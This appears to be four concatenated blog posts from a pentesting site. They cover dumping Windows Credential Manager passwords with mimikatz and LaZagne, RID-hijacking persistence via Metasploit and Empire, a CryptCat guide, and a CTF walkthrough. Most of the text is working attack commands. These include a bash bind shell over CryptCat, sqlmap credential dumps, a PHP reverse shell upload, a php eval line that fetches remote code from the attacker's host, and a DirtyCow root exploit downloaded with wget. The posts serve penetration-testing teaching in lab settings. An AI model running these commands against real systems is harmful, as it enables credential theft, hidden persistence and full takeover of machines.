Credential Dumping: Windows Credential Manager

In this article, we learn about dumping system credentials by exploiting credential manager. We will talk about various methods today which can be used in both internal and external penetration testing.

Table of Content:

Introduction to credentials manager
Accessing credential manager
Metasploit
Empire
Credentialfileview
PowerShell
Mitigation
Conclusion

Introduction to Credential Manager

Credential Manager was introduced with Windows 7. It is like a digital vault to keep all of your credentials safe. All of the credentials are stored in a credentials folder which you will find at this location – %Systemdrive%\Users\<Username>\AppData\Local\Microsoft\Credentials and it is this folder that credential manager accesses. it also allows you to add, edit, delete, backup and even restore the passwords.

Credentials saved in credential manager are of two types:

Web credentials: As Edge and widows are the product of the same company, credentials manager has access to the stored information of Edge browser too, in order to increase safekeeping of saved credentials. It also stores the password of order application provided by Microsoft such as skype, Microsoft office, etc.
Windows credentials: Under this category, all the windows login credentials can be found. Along with any system that is connected in the network.

Applications which are run by windows and has your credentials saved will automatically be saved in credential manager. Even when you update them, change is noted by and updated in credential manager too.

Accessing Credential Manager

To access credential manager, you can simply search it up in the start menu or you can access it bu two of the following methods:

You can open control panel > user accounts > credential manager
You can also access it through the command line with the command vaultcmd and its parameters.

When you connect to another system in the network as using any method like in the following image:

And while connecting when you provide the password and store it for later use too then these credentials are saved in credential manager.

Irrespective of website and its security, when you save any password in the edge or any other application such as skype or outlook, it’s password too gets saved in credential manager. For instance, we have stored Gmail’s password in our practice as shown in the image below:

You can confirm from the following image that the password is indeed saved.

And now, when you access credential manager, using any method, you will find that in windows credentials tab all the system, network passwords are stored.

And under the web credentials tab there are will be application’s passwords and the passwords saved in edge will be saved.

Metasploit

Now all these credentials can be dumped with simple methods. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an amazing credential dumping tool. We have covered mimikatz in detail in one our previous articles, to read that article click here.

And to run mimikatz remotely through Metasploit session, use the following command:

upload /root/Desktop/mmikatz.exe
shell
cd <location of the uploaded file in the target system>
mimikatz.exe

upload /root/Desktop/mmikatz.exe

shell

cd <location of the uploaded file in the target system>

mimikatz.exe

And once the mimikats is executed successfully, you will get credentials from cred manager as shown in the image above.

Empire

Similarly, while using empire, you can dump the credentials by downloading Lazagne.exe directly in the target system and then manipulatinthe lagazne.exe file to get all the credentials. LaZange is on eof the best credential dumping tool. We have covered LaZagne in detail in one our previous articles, to read that article click here.

Use the following commands to dump the credentials with this method :

shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all

shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe

shell wget

shell dir

shell ./lazagne.exe all

After the execution of commands, you can see that the passwords have been retrieved as shown in the following image:

CredentialsFileView

Our next method is using a third-party tool, i.e. credentialfileview. This tool is very effective when it comes to internal penetration testing. To use this tool, simply download it and launch it. After launching itself, it will ask you for the windows password.

Once you provide the password, it will give you all the credentials you need as shown in the image below:

Windows PowerShell

This method of password dumping can prove itself useful in both internal and external pentesting. In this method, you have to run a script in windows powershell. You will find the script here. And once you run the script you will have all the web credentials as shown in the image below:

You can also use powershell remotely to dump credentials with the help of Metasploit. It is very simple as you just have to run a combination of following commands after you have your session:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

load powershell

powershell_import /root/Get-WebCredentials.ps1

powershell_execute Get-WebCredentials

And just like that with the help of powershell commands, you will have the desired credentials.

Mitigation

Following are the measures you can use to keep your passwords safe:

DO NOT save passwords in your system, browser or any other application
Use different passwords for every account
If you have trouble remembering passwords then instead of keeping them in clear text in your system, use an online password manager to keep them safe.
Use the latest version of the operating system and applications.
Manually go to the login page instead of following a link.
Keep firewall/defender enabled
Keep you employees/employers aware

Conclusion

As you have noticed from our article the even though this feature of credential manager that is provided by windows is convenient, it is not secure and once the attacker has the access of your system then these credentials are waiting to be theirs as there is no security layer added to credential manager. It is important to be aware of every feature your operating system is providing just so you can save yourself. Hence, it is important to know how to access the credential manager and how to operate it and how it can be exploited.

We live in a cyber active world and there are login credentials for everything, one can’t remember every credential ever. Though credential manager is utility makes it easy for us and takes the responsibility of saving the passwords, but at what expense?

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Persistence: RID Hijacking

In this post, we will be discussed on RID hijacking which is considered to be as a persistence technique in terms of cyber kill chain and in this article, you will learn multiple ways to perform RID hijacking.

Table of Content

Introduction

FSMO roles
SID & RID
Syntax
Important Key points

RID-Hijacking

Metasploit
Empire

Introduction

Microsoft divided the responsibilities of a DC into FSMO roles that together make a full AD system, FSMO (Flexible Single Master Operation) has 5 responsibilities for forest and domain.

Schema Master (one per forest)
Domain Naming Master (one per forest)
Relative identifier (RID) Master (one per domain)
Primary Domain Controller (PDC) Emulator (one per domain)
Infrastructure Master (one per domain)

SID & RID

The RID is a Relative Identifier which is the last part of SID (security identifier) and should be unique for a particular object within a domain. Each security principal has a unique SID that is issued by a security agent. The agent can be a Windows local system or domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-…-[SubAuthority[SubAuthorityCount]](-RID)

Eg: S-1-5-21-1543651058-3042185658-368006193-1001

Important Key points

The revision is always 1 for current NT versions.
When a new issuing authority is established under Windows (for example, a new computer is deployed or a domain is established), a SID with an arbitrary value of 5 is allocated as an identifier authority.
A constant value of 21 is used as a particular value for the root of this group of sub-authorities, and a 96-bit random number is generated and parcelled out to the three sub-authorities with each sub-authority having a 32-bit chunk.
If the new issuing authority under which this SID was developed is a domain, this SID is referred to as the “SID domain.”
Windows allocates RIDs starting at 1,000; RIDs that have a value of less than 1,000 are considered reserved and are used for special accounts.
For example, all Windows accounts with a RID of 500 are considered built-in administrator accounts in their respective issuing authorities.

RID Hijacking

‘RID Hijacking’ is a tactic for an adversary to persist inside the victim’s system by hijacking the RID the Administrator account for the Guest account, or another local account. Creating persistence in the victim’s system allows an adversary to establish a foothold, continuously regaining access that will be unseen to you and allow to hijacker to logon as an authorized account which adversary has hijacked.

Thus, for this, you need to have privilege account session as we have in the below image, to establish persistence access.

Rid-Hijacking: Metasploit

So, as you know, we had meterperter session with admin privilege and Metasploit provides a module to create persistence in a victim’s machine by hijacking RID of administrator user.

This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow authenticating with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

use post/windows/manage/rid_hijack

set getsystem true

set guest_account true

set session 2

set password 123

exploit

Once you run the exploit, it will check the status of the guest account and, if it is found to be disabled, it will activate the account first and overwrite the RID value from 501 to 500, i.e. the RID value of the administrator account.

As you’ve seen in the above step, the guest’s RID is 500 and the password is 123, so we logged in as a guest to get the CMD with Administrator privilege on the target machine. Here we are going to use the impacket tool to get the CMD shell of the remote machine.

cd /impacket/example
./psexec.py Guest:123@192.168.1.107

1 2	cd /impacket/example ./psexec.py Guest:123@192.168.1.107

As you can observe that we have obtained CMD Shell as “nt authority /system” i.e CMD as an administrator account.

Rid-Hijacking: Empire

RID hijacking is also possible using empire but this module is not available in Empire project you need to clone it module from Github.

git clone https://github.com/EmpireProject/Empire.git
git clone https://github.com/r4wd3r/RID-Hijacking.git

1 2	git clone https://github.com/EmpireProject/Empire.git git clone https://github.com/r4wd3r/RID-Hijacking.git

once both programs get downloaded, fetch the Invoke-RIDHijacking.ps1 file from inside /RID-Hijacking/modules/empire/data/module_source/persistence into /root/Empire/data/module_source/persistence.

cd RID-Hijacking/modules/empire/data/module_source/persistence
cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence

1 2	cd RID-Hijacking/modules/empire/data/module_source/persistence cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence

Also copy the rid_hijack.py from /RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into /root/Empire/lib/modules/powershell/persistence/elevated

cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated
cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated

1 2	cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated

Once you are done with configuration, then launch the module to start the attack, this will initialise the just like Metasploit. First, identify the status of the guest account and then hijack RID =500 for guest user.

usemodule persistence/elevated/rid_hijack*
set UserGuest True
set Password 123
set Enable True
execute

usemodule persistence/elevated/rid_hijack*

set UserGuest True

set Password 123

set Enable True

execute

Again repeat the above step to connect CMD of victim’s machine assure that you should have a privilege shell.

Reference

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

Comprehensive Guide on CryptCat

In this article, we will provide you with some basic functionality of CryptCat and how to get a session from it using this tool.

Table of Content

Introduction
Chat
Verbose mode
Protect with Password
Reverse Shell
Randomize port
Timeout and Delay interval
Netcat vs CryptCat

Introduction

CryptCat is a standard NetCat enhanced tool with two-way encryption. It is the simplest Unix utility tool, which reads and writes data across network connections. It can use TCP or UDP protocol while encrypting the data that is transmitted over the network. It is a reliable back-end tool that is easily driven by other programs and scripts. It is considered to be a network debugging and exploration tool.

CryptCat can act as a TCP/UDP client or server when connected to or when it acts as a listener to the socket. It can take a password and adds a salt to encrypt the data that is being sent over the connections. Without providing a specified password, it will take the default password i.e. “metallica”.

We can explore its working and usage by exploring its available options.

cryptcat -h

1	cryptcat -h

Chat

CryptCat can be used to chat between two users. We need to establish a stable connection before the chat. To do this, we need two systems out of these two systems one will be a listener and the other will be an initiator. So that communication can be done from both ends.

Here, we are trying to create a scenario of chat between two users with different operating systems.

User 1

OS: Kali Linux

IP Address: 192.168.0.107

Role: Listener

To initiate listener in Kali Linux, follow this command to create a listener:

cryptcat -l -p 42

1	cryptcat -l -p 42

User 2

OS: Ubuntu

IP Address: 192.168.0.108

Role: Initiator

To create an initiator, we will just provide the IP Address of the system where we started the listener followed by its port number.

cryptcat 192.168.0.107 42

1	cryptcat 192.168.0.107 42

Verbose mode

In CryptCat, the verbose mode can be initiated by using the [-v] parameter. Now, the verbose mode is made for generating extended information from our actions. We will try the above chatting mechanism with verbose mode. We can see that when we add [-v] to the CryptCat command it displays the information about the process that its performance while connecting.

At Listener Side

cryptcat -lvp 42

1	cryptcat -lvp 42

At Initiator Side

cryptcat -v 192.168.0.107 42

1	cryptcat -v 192.168.0.107 42

Protect with password

In CryptCat, we can protect our connection of chatting with a password and password can be applied by using the [-k] parameter. We know that CryptCat provides us end to end encryption, but by using the [-k] parameter we can provide the extra layer of protection to our connection. So that it is almost impossible to decrypt our connection. We can apply for this protection with the following commands.

At listener side, we apply [-k] parameter along with the password.

cryptcat -k ignite -lvp 42

1	cryptcat -k ignite -lvp 42

At the Initiator side, we need to apply the same password applied by the listener so that we can connect to some connection.

cryptcat -v -k ignite 192.168.0.107 42

1	cryptcat -v -k ignite 192.168.0.107 42

Reverse shell

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine receives the connection through a port by providing a password. To activate the listener on the target machine for getting shell, use the following command:

cryptcat -k mysecret -l -p 3333 0<myfifo | /bin/bash 1>myfifo

1	cryptcat -k mysecret -l -p 3333 0<myfifo \| /bin/bash 1>myfifo

Now, at the attacker side, we just need to connect to the victim. Then we can authenticate our self as we got its root access or by the help of whoami command.

cryptcat -k mysecret 192.168.0.107 3333
whoami
ip a

cryptcat -k mysecret 192.168.0.107 3333

whoami

ip a

Randomize port

If we cant decide our port number to start the listener or establish our CryptCat connection. Well then, CryptCat has a special [-r] parameter for us which gives us a randomize local port.

cryptcat -lv -r

1	cryptcat -lv -r

Timeout and Delay interval

Most of us are confused between these terms. Timeout is supposed to be a time to complete our task or program. Whereas the delay interval is the interval time between two individual requests or tasks. So in CryptCat, we have [-w] parameter for timeout and [-i] parameter for delay interval. To apply these two individual parameters to get our desired results.

At listener side, we apply both times out and the delay interval

cryptcat -v -w 30 -i 10 -l -p 8080

1	cryptcat -v -w 30 -i 10 -l -p 8080

At the initiator, we are only applying timeout.

cryptcat -v -w 2 192.168.0.7 8080

1	cryptcat -v -w 2 192.168.0.7 8080

Netcat vs CryptCat

Well before comparing these two first, we need to know about the Netcat or nc. It is a utility tool use TCP and UDP connection to read and write in a network. It can be used for both security and hacking purposes.

In the case of hacking, it can be used with the help of scripts which makes it quite dependable. And if we need to talk about security, it helps us to debug the network along with investing it. If we want to learn all the working of the Netcat. We have covered netcat in our previous article and to read that article click here.

And when it comes to CryptCat, it is a more advanced version of Netcat. It provides us with the two-way encryption that makes our connection more secure. We are comparing these two amazing tools based on connection encryption of the chatting feature by intercepting their network interface with the help of Wireshark.

Netcat:

As we know we apply a listener and an initiator to start this connection for chatting. Along with that, we initiated the Wireshark to intercept its network interface.

At the listener side, we are using [-l] parameter for listening and [-p] parameter for the port number.

nc -l -p 3131

1	nc -l -p 3131

At the Initiator side, we just need to provide a port number, along with the listeners IP Address.

nc 192.168.0.111 3131

1	nc 192.168.0.111 3131

Now, we have to check whether our Wireshark was able to catch something or not. As we can see that we successfully intercepted the network and see this network chat.4

Cryptcat:

In cryptcat, we already know that it provides us with two-ways encryption. Which makes the connection network more secure that Netcat. But we need to check this as well by intercepting its chatting with the help of Wireshark. For that connection, we needed a listener and an initiator for connecting a connection.

At the Listener site, we will use the [-p] parameter for port and [-l] for initiating the listener.

cryptcat -l -p 3131

1	cryptcat -l -p 3131

At the initiator side, we just need to provide IP Address along with listeners port number.

cryptcat 192.168.0.111 3131

1	cryptcat 192.168.0.111 3131

Now check whether we can acquire anything or not. As we can see that this chat is in encrypted mode.

That is the main difference between the Netcat and the Cryptcat. One provides encryption in its network and the other is not. Some people might say that CryptCat = encryption + Netcat.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher, Contact Linkedin and twitter.

VulnUni: 1.0.1: Vulnhub Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from emaragkos, called ‘VulnUni: 1.0.1,’ which is available online on vulnhub for those who want to increase their skills in penetration testing and Black box testing.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

Netdiscover
Nmap
Enumeration
Browsing HTTP service
Extracting URLs through burpsuite spider
Exploitation
Using sqlmap to exploit SQL vulnerability
Extracting User information using sqlmap
Privilege Escalation
Uploading php shell upload
Using msfconsole web delivery to get a reverse shell
Using DirtyCow to exploit kernel version
Capturing the flag

Walkthrough

Let’s get started and pwn this machine!

Scanning

To identify our target, we will use netdiscover and our target IP is 192.168.1.148 as shown in the image below:

Let’s proceed further with Nmap to scan our target IP to find open ports if any. Use the following command to scan the IP:

nmap -A 192.168.1.148

1	nmap -A 192.168.1.148

And as the result shows, port 80 is open with the service of HTTP.

Enumeration

As we are enumerating further, we open the target IP in the browser. The webpage that we came across was about the university.

We couldn’t find anything useful here so we moved on and we started a Directory Bruteforce to enumerate the machine further. This gave us some directories and files namely contact, about, courses etc. But apart from this, there wasn’t anything useful here.

Then, I launched burpsuite and captured the request of the URL in the intercept tab as shown in the following image:

Further, through the spider feature od burpsuite, we were able to find any URLs. Out of these, the E-Class URL was opened. Along with this, we also found the application version, i.e. 1.7.2, could be vulnerable and can be exploited. We made a note of this as it will be useful in further pwning of the lab.

The directory e-class got us a login form. When tried to log in with default username and password, i.e. admin:admin, we successfully logged in.

But after logging in there was a Document Expired error and the URL was redirecting to Vulnuni.local as shown in the image below :

Therefore, we added the host to our /etc/hosts file just like in the image below :

Earlier, we found that the application was using 1.7.2 version which is outdated. And after gathering open intelligence we found that the particular version of vulnerable to the exploit which was available on exploit-db as shown in the image below :

To use the exploit to our advantage, we needed to capture the request of the login page through burpsuite as shown in the image below :

After capturing the request, copy it to a text file and save file and save it as shown in the following image:

Now, with the help of sqlmap we will inject our malicious query, with the help of the following command:

sqlmap -r vulnuni --dbs --batch

1	sqlmap -r vulnuni --dbs --batch

Executing the above command, lead us to find five databases in total, as shown in the image below, all we need now is to get credentials for anyone of the database.

As during the challenge, e-class directory proved to be of importance, we decided to get credentials of eclass first, hence the following command:

sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

1	sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

We found a few passwords, as shown below, and tried to be by one to log in.

And soon we were successfully logged in as the password is ilikecats89 which you can also observe in the image below :

Upon traversing, we found a link through which we can upload our shell, the link is – http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php

In order to upload our malicious file, we first downloaded php reverse shell and changed IP and PORT to the local host and local port and the uploaded its the compressed version. You will find similar in the image below :

After uploading shell, we started the netcat listener by using the following command:

sudo nc -nvlp 443

1	sudo nc -nvlp 443

Then we simply access to PHP file we uploaded

http://vulnuni.local/courses/tmpUnzipping/phpshell.php

1	http://vulnuni.local/courses/tmpUnzipping/phpshell.php

Once, the shell file is executed, we have our shell through netcat, as shown in the image below :

But as it is not the best working environment, we are continuing with Metasploit’s “web delivery” Module to transfer our netcat session into a meterpreter one which will further provide us with more options. And for this, type:

use /exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.145
set payload php/meterpreter/reverse_tcp
set srvport 4445
exploit

use /exploit/multi/script/web_delivery

set target 1

set lhost 192.168.1.145

set payload php/meterpreter/reverse_tcp

set srvport 4445

exploit

Note: To get meterpreter shell we sent the php -d allow_url_fopen =true -r “eval(file_get_contents(‘http://192.168.1.92/Oyd1Yv5lI’));” in terminal above.

To upgrade the shell into TTY shell which is more powerful. For this conversion of shell use the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

1	python -c 'import pty;pty.spawn("/bin/bash")'

After getting the TTY shell, we navigated through many directories and we found user flag in the home directory with the help of following commands:

cd /home
ls
cd vuluni
cat flag.txt

cd /home

cd vuluni

cat flag.txt

Privilege Escalation

We will use the following command to we get the kernel version of the target machine.

uname -r

uname -r

Then through OSINT, we found that kernel was vulnerable to DirtyCow. Therefore, we downloaded the exploit to our local machine and saved it in /var/www/http and then started the apache server on port 80. Further, we moved the dirtycow.c file to the /tmp directory of the target by using the following commands:

cd /tmp
wget http://192.168.1.145/dirtycow.c

1 2	cd /tmp wget http://192.168.1.145/dirtycow.c

Now, compile the exploit’s c language file to executable binary file using the following command along with giving it permissions as following:

gcc dirtycow.c -0 root -pthread
./root
cd /root
ls
cat flag.txt

gcc dirtycow.c -0 root -pthread

./root

cd /root

cat flag.txt

And voila!! We have successfully rooted the lab.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.